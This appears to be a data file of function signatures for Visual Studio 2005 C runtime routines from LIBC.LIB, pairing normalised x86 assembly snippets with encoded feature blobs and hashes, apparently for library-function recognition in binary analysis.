+__wdospawn,"LEA R32,DWORD PTR DS:[R32+R32*4+CONST]\nPUSH CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nMOVZX R32,R16\nPUSH R32\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nPOP R32",gTadITtqcwrCq4mGnsXEITzOYSKY90Izcug6RTtqcwrCq4mGDwClx/31W00AAAAAmPdCMycPdRI9TP+eDSTjNRsuW38AAAAA+Hf5wRsuW38AAAAAGy5bf+2xhSm+knn4O2pzCpyGUTi5m+6qu7ZcLLAM10MNJOM1vpJ5+L6Sefj+IADpCuL/EpyGUTi5m+6q/iAA6RsuW3/ADk2pnIZROPh3+cEItQ6aCLUOmv31W00AAAAAwA5NqRsuW38AAAAAwquJhru2XCwAAAAAPUz/nh/maVUWxCow+Hf5wf31W00AAAAAsAzXQ8SSpmgAAAAA/fVbTUL41tYAAAAAQvjW1gAAAAAAAAAA7bGFKZj3QjMZAzqEFsQqMOSrVGIAAAAAu7ZcLPh3+cEhh3ljH+ZpVT1M/57ebTYt5KtUYj1M/57ebTYtn3GFhPh3+cG7tlwsuZvuqsSSpmgAAAAA3m02LQri/xLSaks5GQM6hJj3QjOexcQhxJKmaEL41tYAAAAAPM5hIpj3QjOexcQhnIZRONexE2p7fdBY0mpLOYE2nSENzMABe33QWNexE2oAAAAAJw91Egri/xLSaks5u7ZcLIE2nSENzMAB17ETapyGUTgPAKXHu7ZcLPh3+cG7tlwsDczAAXLoOkUAAAAAIYd5Y7AM10O7tlws,[],9fcda0f398407adf2dd9ea94ac2650ce967d12c1,VS2005,LIBC.LIB
+__setjmp,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],EBP\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],ESP\nMOV R32,DWORD PTR SS:[ESP]\nMOV DWORD PTR DS:[R32+CONST],R32",Us42lQAAAAAAAAAA9CnuCFLONpUAAAAA+Hf5wVLONpUAAAAA3qQmM/h3+cH0Ke4I,[],a0d78119d133264c0b09b30f37db1336c93e4e96,VS2005,LIBC.LIB
+__strnicoll,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",CXYH8EupfWBPi8wKAaF1swAAAAAAAAAA0os9zwAAAAAAAAAAT4vMCgAAAAAAAAAAS6l9YD/QZKuwlLLIP9Bkq8K8QFbSiz3PsJSyyAGhdbMAAAAAwrxAVgAAAAAAAAAA,[],7b7821a130dba679b6d4c545d3b790123ad57b5e,VS2005,LIBC.LIB
+__aulldiv,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL R32\nADD R32,R32\nJCC CONST",IYd5Y3WBokOchlE4nIZROHWBokOHR1I/ULjQ8IdHUj+chlE4nIZROIdHUj8hh3ljh0dSP3WBokMAAAAAdYGiQ7YU/3IAAAAAbMNFZaN6Gjugedeuo3oaO4JLXxQAAAAAthT/cgAAAAAAAAAAoHnXrrYU/3IAAAAAgktfFIJLXxRQuNDw,[],293f78ad4f5b0faeaf915cd5afce0e7d4f3f9c43,VS2005,LIBC.LIB
+__except_handler3,"PUSH EBP\nLEA EBP,DWORD PTR DS:[R32+CONST]\nPUSH -1\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nMOV R32,CONST",IYd5Y5dxUZ5cUzXXl3FRnv5P0mgAAAAAu7ZcLJdxUZ75y5whyhErz0UU0t7SSp8G/k/SaAAAAAAAAAAAXFM110Wew+sAAAAA+cucIUWew+tWMWGZl3FRnv5P0mgAAAAA0kqfBru2XCwAAAAARRTS3v5P0mgAAAAAVjFhmUWew+shh3ljRZ7D67u2XCwAAAAA,[],e9b5cddbe5e06aad022b6c568f9459697b135b38,VS2005,LIBC.LIB
+__seh_longjmp_unwind@4,"PUSH EBP\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV EBP,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nCALL CONST",QdX/kwAAAAAAAAAA,O3R/QQAAAAAAAAAA,936491fb6c1fe0707ad971b313f0cd120eaeaeb1,VS2005,LIBC.LIB
+__setenvp,"LEA R32,DWORD PTR DS:[R32*4+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nCMP R32,R32\nMOV DWORD PTR DS:[0],R32\nJCC CONST",w/oUekwAqHheToBobZ6rtEwAqHheToBolwCtt1y+znDO9ryh8fIqYW2eq7SMCKAxh0dSP1rklfIAAAAAWuSV8o/izv0AAAAA2M0EplrklfKHR1I/b79NHQiCY1nD+hR6zva8oY/izv0AAAAAXk6AaPHyKmFMzUVGTACoeG2eq7SMCKAxCc6a9/cm78Rvv00d9ybvxAiCY1nD+hR6CIJjWQAAAAAAAAAAjAigMQAAAAAAAAAAXL7OcI/izv0AAAAAj+LO/QnOmvfYzQSmTM1FRm2eq7SMCKAx,[],97d128cf232e077f292f442cccfa0d8c82ab5292,VS2005,LIBC.LIB
+__ismbcalnum,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",z+tiHKzfs+ac7n8wXJYKgcm7klis37PmnO5/MKzfs+bJu5JY3WlkKervkiprRHqorN+z5gAAAAAAAAAAybuSWAAAAAAAAAAA6u+SKsm7klhclgqBa0R6qKzfs+at5OIJreTiCazfs+bP62Ic,[],01c205920f4c1bbe7cc6710beb2c5ba88a5d5339,VS2005,LIBC.LIB
+__mbscmp,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST,OVp8YAAAAAAAAAAAO4eIloz41XgAAAAAM283HzNvNx+P4s79M283H4z41XiP4s79BVe5lzlafGAAAAAAjPjVeAA5j7eM+NV4O4eIljNvNx8AAAAAjPjVeCbu4WVeo4MnDczAAYz41XgAAAAAj+LO/TuHiJYNzMABXqODJzNvNx8AAAAAADmPtzlafGAAAAAAj+LO/TuHiJYNzMABDczAATNvNx8AAAAAOqSkNDNvNx8AAAAAK3XlUTqkpDQFV7mXJu7hZTlafGAAAAAA,[],46f0c1df0c20d4ad58be77ac362208d09581bbaf,VS2005,LIBC.LIB
+__itoa,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nPOP EBP\nRETN",tZzXJOwDOqEAAAAAx2PWtOwDOqEAAAAAcMiU5LWc1ySchlE4nIZROLWc1yTHY9a07AM6oQAAAAAAAAAA,[],4555b555d3c9bda04404001e43fcb68a8d3722a0,VS2005,LIBC.LIB
+__ultoa,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nADD ESP,CONST\nRETN",6YtODwAAAAAAAAAA,Au8t2Cbu4WUAAAAAJPTvpOAurj4AAAAAqpPdsgAAAAAAAAAAQUXQGybu4WUAAAAAqLu1N+Aurj4AAAAAJu7hZRYcYf4AAAAA4C6uPhYcYf6yBKM2Fhxh/qi7tTck9O+k8iSxV0FF0BsC7y3YsgSjNvct40QAAAAA9y3jRPct40Sqk92y,48e9476e0577b4f7c9a8f1f2ebffea8546ac6cf8,VS2005,LIBC.LIB
+__i64toa,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",IYd5Y1hZdp+7IZT2uyGU9n2ptmpYWXafWFl2n32ptmoAAAAAfam2agAAAAAAAAAA/9X4u32ptmq7IZT2uyGU9n2ptmohh3lj,[],5e3b9f16edb2f4671acf893929e6f8148a7f0a47,VS2005,LIBC.LIB
+__ltoa,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD ESP,CONST\nPOP EBP",WFl2nxP/IfAAAAAAuyGU9hP/IfBYWXaf/9X4uxP/IfC7IZT2E/8h8AAAAAAAAAAA,[],79f80169032b5733753bdbfe016f431bba51c848,VS2005,LIBC.LIB
+__ui64toa,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST",Myp74QAAAAAAAAAA,xsmRcsbJkXK3F5/Sp+n+4uAurj4AAAAAspnIrOAurj4AAAAA4C6uPhYAjMghh3ljtxef0gAAAAAAAAAA+0FUxL/RaZ3QuaLfIYd5Y7IEozZy6DpFv9FpnShdv6sAAAAAcug6RRYAjMiyBKM2sgSjNsbJkXIAAAAAKF2/qxYAjMgAAAAAFgCMyLKZyKyn6f7i0Lmi3yhdv6sAAAAA,fad6b0aa3174a154ba0c7930210272577238e706,VS2005,LIBC.LIB
+__mbctokata,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",F42onE+LzAqHR1I/h0dSP0+LzAoAAAAAT4vMCgAAAAAAAAAAi1Jw/0+LzAoXjaic,[],fadba75bf5b53f6153b5528c3350a15afbff56e3,VS2005,LIBC.LIB
+_sin,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,LLApNwVtZtDRSJSl6FWr2jfULVPNLBGminytBQVtZtAAAAAABW1m0CywKTdvZoaA0UiUpYp8rQWKfK0FzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAnO5/MCywKTeP65fekOKhEXtGESB7RhEgAFkkeehVq9qc7n8wLLApNyywKTdvZoaAb2aGgNFIlKUAAAAAj+uX3gVtZtDRSJSlN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEg,[],06bb0b69f249e2bf478feae68a7c56b90bbd08f3,VS2005,LIBC.LIB
+__CIsin,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,a546b35194009c601768b18e6a48dd7d0d9faa4b,VS2005,LIBC.LIB
+_wcsstr,"MOVZX R32,WORD PTR DS:[R32+R32]\nMOVZX R32,R16\nSUB R32,R32\nJCC CONST",Ju7hZT/DesUAAAAAP8N6xQAAAAAAAAAAr5cd3RsuW38AAAAAGy5bfybu4WURUZAktobFj+lYYevWx+eJ1sfniRsuW3/pWGHrEVGQJBsuW38AAAAA6Vhh6z/DesWdoIgzGy5bf+lYYeu2hsWPnaCIMxsuW38AAAAA,[],f2dc0cd52ab4126b2981685b850c1266536be9ce,VS2005,LIBC.LIB
+_wcscoll,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,m5BQ/AAAAAAAAAAAeUxKbwAAAAAAAAAAS6l9YE6jm9taVU8DTqOb25uQUPx5TEpvWlVPAwAAAAAAAAAA,[],62b394da8c736cb49b19612ddec85fe6933ae288,VS2005,LIBC.LIB
+_acos,"FLD1\nFADD ST,ST(1)\nFLD1\nFSUB ST,ST(2)\nFMULP ST(1),ST\nFSQRT\nFXCH ST(1)\nFPATAN",MefoxdFIlKUAAAAA8BCZXpDioRFreRQ/0UiUpYp8rQWKfK0F6FWr2iGHeWM/yxNFN9QtU9FIlKUAAAAAyNV7xCGHeWM/yxNF0UiUpXtGESB7RhEgP8sTRYp8rQWKfK0F6FWr2jfULVPNLBGma3kUPzHn6MUx5+jFAFkkeehVq9qc7n8winytBSGHeWMAAAAAzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAkOKhEXtGESB7RhEgMefoxdFIlKUAAAAAnO5/MOhVq9rI1XvEIYd5Y5DioRHwEJle,[],2658b9f81a5f4a2e7d1a8948af3e589e8c5eb3a1,VS2005,LIBC.LIB
+__CIacos,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,6cdf2d7fc5f86ec692fc42d5b7065c57cd45ccfb,VS2005,LIBC.LIB
+__getws,"PUSH R32\nCALL CONST\nMOVZX R32,R16\nCMP R32,CONST\nPOP R32\nJCC CONST",cug6RQExIjANzMABW8dyBQExIjDoVavaDczAAbkOyqQAAAAAATEiMAAAAAAAAAAAuQ7KpAAAAAAAAAAA6FWr2nLoOkX6sBAJ8ThTtAExIjDoVava+rAQCVvHcgUAAAAA,[],62ba4e7ebc46a8b320f20d26c023df3e337752df,VS2005,LIBC.LIB
+_wcsncmp,"MOVZX R32,WORD PTR DS:[R32]\nMOVZX R32,WORD PTR DS:[R32]\nSUB R32,R32\nPOP EBP\nRETN",Gy5bf7GNN6Cz7rZ8T4vMCgAAAAAAAAAAcMiU5Ox2hrtPi8wKQ0WReRsuW3+xjTegs+62fLGNN6BDRZF57HaGu7GNN6AbLlt/sY03oAAAAAAAAAAA,[],9513fc64977ab090c7aea6a7c5ecea5fc7a06a8d,VS2005,LIBC.LIB
+__wspawnlpe,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nPOP EBP",eei+egAAAAAAAAAAAoVQxXnovnp748YLe+PGC3vjxgt56L56,[],171d62738e5e0ba6a732fa0c2d5ef2e0b94bae4f,VS2005,LIBC.LIB
+__alldiv,"INC R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nNEG R32\nNEG R32\nSBB R32,0\nMOV DWORD PTR SS:[ESP+CONST],R32\nMOV DWORD PTR SS:[ESP+CONST],R32\nOR R32,R32",ZbjaznLoOkXe7di8ULjQ8OaXaomchlE45pdqiZF5037wM7nv+gLlxZF5037wM7nvoHnXrpfae5QAAAAA+xbteYJLXxRQuNDwl9p7lJF5037wM7nvnIZROOaXaokhh3ljcug6RfsW7Xmgedeu8DO57wAAAAAAAAAAkl7TRBY4CCJluNrOFjgIInLoOkXe7di8kXnTfgAAAAAAAAAAgktfFIJLXxRQuNDw3u3YvPsW7XmgedeuIYd5Y/oC5cWchlE4nIZROPoC5cXml2qJ,[],b482e3d11116aebeeccd52b23800fde9c4c51a4b,VS2005,LIBC.LIB
+_atof,"MOVZX R32,BYTE PTR DS:[R32]\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST",JAPDnT3XBaRj7p98cug6RVsJ5c7o/oHQY+6ffHLoOkUAAAAA6P6B0CQDw50AAAAAWwnlzgAAAAAAAAAAPdcFpFsJ5c7o/oHQx9s2wD3XBaRj7p98,[],da0375ace812c6a9042d9b75f3c5ce9d564f62bb,VS2005,LIBC.LIB
+_fputs,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH DWORD PTR SS:[EBP+CONST]",ErYEHwAAAAAAAAAA,NELWFQAAAAAAAAAANELWFQAAAAAAAAAANSlAMjUpQDKEcIcdhHCHHTRC1hXYzQSmKrNC3jUpQDIAAAAAXqODJzUpQDIAAAAANELWFQAAAAAAAAAA2M0EpjRC1hXoVavaPAoaXTUpQDJcpTmJ6FWr2jRC1hXoVavaNELWFQAAAAAAAAAAWNooOlylOYkqs0Le6FWr2jRC1hVeo4MnXKU5iTRC1hVY2ig6,b7ceee33d2aa10737577d3bb211b613ae1c6e04d,VS2005,LIBC.LIB
+__mbsicmp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR DS:[0],0\nPUSH R32\nPUSH R32\nPUSH R32\nJCC CONST",/Iq5GqjQSuAAAAAApYYfwvxtBNcAAAAA/Iq5Goz41XgAAAAAStkitCbu4WV9/QiMStkitIz41Xju/kswff0IjKjQSuAAAAAA/G0E10rZIrQUxIhq7v5LMIz41XgAAAAAJu7hZajQSuAAAAAAqNBK4ErZIrQUxIhqjPjVeIUmH4GM+NV4jPjVeCbu4WXLgsuVy4LLlfxtBNcAAAAAFMSIavnTZs0NzMABDczAAajQSuAAAAAAl3FRnkL41tYAAAAAJu7hZUL41tYAAAAA+dNmzYejbX1P2IZmFMSIavnTZs0NzMABhSYfgUL41tYAAAAADczAAYz41XgAAAAA+dNmzXLoOkVP2IZmQvjW1gAAAAAAAAAAVSelwqWGH8LIMIRCT9iGZvyKuRoAAAAAh6NtfZdxUZ5Yz2W+T9iGZvyKuRoAAAAAWM9lvvyKuRoAAAAAyDCEQkL41tYAAAAAcug6RZdxUZ5Yz2W+WM9lvvyKuRoAAAAA,[],eac9e003d273aecd113ddd9c72a08cfb372edb21,VS2005,LIBC.LIB
+__cwait,"OR R32,CONST\nOR DWORD PTR SS:[EBP+CONST],CONST\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST R32,R32\nJCC CONST",Y6Z8hD/DesUAAAAAOwvj3RCJOp6t2Th1MQ8PbfhcQyMNzMABPgUQP2OmfIS7tlws27kmdzsL490AAAAAcga5XBCJOp6t2Th1P8N6xQAAAAAAAAAAu7ZcLGOmfIRC5JWODczAAXIGuVwAAAAAQuSVjvhcQyMxDw9t+FxDI7eSlafbuSZ3t5KVpxCJOp6t2Th1rdk4dRCJOp4AAAAAEIk6nj/DesUAAAAA,[],5434b87bb44d98d1124c79be7115a517fa1aec05,VS2005,LIBC.LIB
+__ismbcpunct,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",ybuSWAAAAAAAAAAAgyqR1Mm7klhclgqBa0R6qKzfs+at5OIJreTiCazfs+bP62IcXJYKgcm7klis37Pmz+tiHKzfs+YnD3USJw91Eqzfs+bJu5JYrN+z5gAAAAAAAAAA3WlkKYMqkdRrRHqo,[],43f959023f01dbd63c352a220b145b45e742cbab,VS2005,LIBC.LIB
+__mbsnset,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nXOR R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",/NQrLcJCW/iP4s79WCAI+D/DesUAAAAAj+LO/XLoOkVy6DpFcug6RSbu4WUp6uhIJu7hZUKzGP8AAAAAKeroSCbu4WUNDA4gc7qdJPzUKy0Jn3wVDQwOIOTBSXwAAAAAJu7hZeTBSXwAAAAA5MFJfI/izv1y6DpFCZ98FcJCW/iP4s79cug6RcJCW/gUxIhqj+LO/XLoOkVy6DpFFMSIasJCW/gQb2Pycug6RSbu4WUp6uhIEG9j8sJCW/gAAAAAwkJb+D/DesUAAAAAP8N6xQAAAAAAAAAADQwOIL391V8AAAAAJu7hZb391V8AAAAAvf3VX9zYEyFy6DpFcug6RSbu4WUp6uhIKeroSCbu4WUNDA4gKeroSCbu4WUNDA4gDQwOIEKzGP8AAAAANOP9gHO6nSRYIAj4QrMY//zUKy0AAAAA3NgTIfzUKy0AAAAA/NQrLY/izv1eo4MnXqODJ3LoOkUAAAAA,[],ecb7ba09c0a079889ed24437b0b68b8753c681e3,VS2005,LIBC.LIB
+__lfind,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",mpR0TQ3MwAFja4qTY2uKk5qUdE0m7uFlSQmJeibu4WVBRdAbJu7hZaqT3bIAAAAAqpPdsgAAAAAAAAAADczAAaqT3bIAAAAAQUXQG5qUdE0AAAAA,[],d842571e7bbaf13947e0fd084ddcfd7398a84d95,VS2005,LIBC.LIB
+__chkesp,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,0\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32",IYd5YwpYKtgBoXWzAaF1swAAAAAAAAAAClgq2AAAAAAAAAAA,[],5115ed36bec03b67f4ec40ba2f65d09a44f74938,VS2005,LIBC.LIB
+__heapmin,"CALL DWORD PTR DS:[0]\nPUSH CONST\nPOP R32\nCMP R32,R32\nJCC CONST",lN3kVQAAAAAAAAAAm5BQ/AAAAAAAAAAAUs42lQAAAAAAAAAAWz9DPpuQUPyU3eRV08nmxlLONpVbP0M+,[],de4ebf5226fbc067a9a3b66635142e45efc69a80,VS2005,LIBC.LIB
+___crtCompareStringA,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nMOV R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],R32",SL8I6730X9NqhssSPmovC2HqmGk1FnITTmrDzm/YAfvfE8DlaobLEi5Vuf4AAAAAcug6RSbu4WU1/TixuyGU9nLoOkVmeTE12M0Epgf9iUE+ai8LNf04sSbu4WW9wUAzPmovC2HqmGnWfO4MB/2JQTRW0csAAAAA1nzuDDRW0csAAAAAuyGU9m/YAfuchlE4uyGU9nLoOkWXCUAQTmrDzibu4WVujaVuvfRf0ybu4WXY6V6vlwlAEN8TwOVOasPOvcFAM+Kh3IcAAAAAnIZROGZ5MTXg//0Zbo2lbibu4WVh82Z2cug6Rd8TwOVOasPOYeqYaWZ5MTXdHBTWNRZyE2Z5MTUAAAAA3RwU1j5qLwsthlOe3xPA5bshlPYH/YlBJu7hZeKh3IcAAAAA4qHchwAAAAAAAAAANFbRy+Kh3IcAAAAAYfNmdibu4WXV7FxILlW5/rshlPbt4GwyZnkxNeKh3IcAAAAA4P/9GWZ5MTVh6php7eBsMoL3GwnFhoGe2Oler7shlPbt4Gwyb9gB+ybu4WViSX6Xcug6RdZ87gxGUlrcjhJ3pi5Vuf5IvwjrRlJa3Cbu4WVy6DpF1excSHLoOkUAAAAALYZTngf9iUE+ai8LuyGU9oL3GwnFhoGexYaBnoejbX04Gfmccug6RbshlPachlE4Ykl+l05qw84AAAAAnIZRONZ87gzg//0ZgvcbCYejbX04Gfmc4P/9GdZ87gxh6phpOBn5nOKh3IcAAAAAYeqYadZ87gzdHBTWh6NtfSbu4WW7IZT23RwU1j5qLwvYzQSm,[],b0bfc7aa0e14d09a13c9c49d83b43abe684c9974,VS2005,LIBC.LIB
+__wfullpath,"PUSH CONST\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",DczAAaqT3bIAAAAAcug6RRmmZv+KkjtD9CnuCCXNs/gAAAAA34RLAfQp7ggZpmb/ipI7Qw3MwAEAAAAA2aWEWQ3MwAEAAAAAFp+5ACBo4wTpWGHrqpPdsgAAAAAAAAAAGaZm/w3MwAEAAAAA/WpZunLoOkVy6DpFGaZm/w3MwAEAAAAAJc2z+HLoOkVy6DpFcug6RfbMFSHZpYRZ9swVIQ3MwAEAAAAADczAAaqT3bIAAAAAcug6RQ3MwAFy6DpF6Vhh6yBo4wQuVbn+IGjjBKqT3bIAAAAALlW5/v1qWbrfhEsB,[],0f2a1e01f1fc51932d8aea35bcabd8fe37ef9826,VS2005,LIBC.LIB
+__chkstk,"SUB R32,R32\nMOV R32,ESP\nTEST DWORD PTR DS:[R32],R32\nMOV ESP,R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nRETN",OQTkHTkE5B1uxou8VWkLBm7Gi7w5BOQdbsaLvAAAAAAAAAAA,[],3938e68dc25ffe40c53385c590306600a762caf1,VS2005,LIBC.LIB
+__alloca_probe,"SUB R32,R32\nMOV R32,ESP\nTEST DWORD PTR DS:[R32],R32\nMOV ESP,R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nRETN",bsaLvAAAAAAAAAAAOQTkHTkE5B1uxou8VWkLBm7Gi7w5BOQd,[],3938e68dc25ffe40c53385c590306600a762caf1,VS2005,LIBC.LIB
+__wexeclp,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN",NQ7aigAAAAAAAAAA,QuVyowAAAAAAAAAA,d39ac6c497fda8a05bf277df01157198633e4edf,VS2005,LIBC.LIB
+__ismbcl2,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",tG2SEQAAAAAAAAAArlC47U+LzApY2ig6T4vMCgAAAAAAAAAAWNooOk+LzApY2ig6GpScFU+LzAquULjtWNooOk+LzAq0bZIR,[],404f88f2e9ff5ac0d2a1d078d367a0fa27b14d75,VS2005,LIBC.LIB
+__ismbcl1,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",tG2SEQAAAAAAAAAArlC47U+LzApY2ig6T4vMCgAAAAAAAAAAWNooOk+LzApY2ig6GpScFU+LzAquULjtWNooOk+LzAq0bZIR,[],c025584cc87b9d94e87f4c5f50016f43bac3e37d,VS2005,LIBC.LIB
+__ismbcl0,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",ZoKcu1LONpVasJfoUs42lQAAAAAAAAAA9vATL1LONpVSDvi0WrCX6FLONpX28BMvUg74tAAAAAAAAAAA,[],c1c8aeec6b1dad5347854591c4e3d2841d9ac3be,VS2005,LIBC.LIB
+__wstrdate,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32",gY7j6QAAAAAAAAAA,[],4fb3fa06716886ed746aa640f4bfd85b3360028f,VS2005,LIBC.LIB
+__fpmath,"CALL CONST\nCALL CONST\nMOV DWORD PTR DS:[0],R32\nCALL CONST\nFCLEX\nRETN",uAKFXQAAAAAAAAAA,8vwYSQAAAAAAAAAA,6554ce8700a12536cd7d82d8635b9495037e8718,VS2005,LIBC.LIB
+__cfltcvt_init,"MOV R32,0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[0],R32\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],0\nMOV DWORD PTR DS:[CONST],R32\nRETN",8vwYSQAAAAAAAAAA,[],f741bb417aca2a9f838374f697b8ee9a0c3dc8f3,VS2005,LIBC.LIB
+__fpclear,RETN,AaF1swAAAAAAAAAA,[],8bf7b464aaa2c2b536aa1d76a1297c19155f5603,VS2005,LIBC.LIB
+___setfflag,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",VAaI5gAAAAAAAAAA,[],7137a6e8ef1a8e12f742c0172399a5870b8fcaf0,VS2005,LIBC.LIB
+_vsprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32",653N1wAAAAAAAAAA/gc2HuudzdcAAAAAFgSryf4HNh43XfGVN13xleudzdcAAAAA,[],008c174fea347f230a6b566adb25e19acd6d284b,VS2005,LIBC.LIB
+___dtold,"MOV R32,DWORD PTR SS:[EBP+CONST]\nOR R32,R32\nMOV WORD PTR DS:[R32+CONST],R16\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",f2QeHuRSvJ9y6DpFfUKLK2gXNlMAAAAAcug6RbbrCof6NnEGtusKhwAAAAAAAAAA+jZxBnLoOkUAAAAAl3FRnmgXNlMAAAAA5FK8n31Ciyty6DpFaBc2U3LoOkUAAAAAQvjW1gAAAAAAAAAAcug6RX1CiytGgZLORoGSzkL41tYAAAAAcug6RZdxUZ46MgI8OjICPGgXNlMAAAAA,[],58ed8e603255c6f6382fd1168d9443ecc4be4e08,VS2005,LIBC.LIB
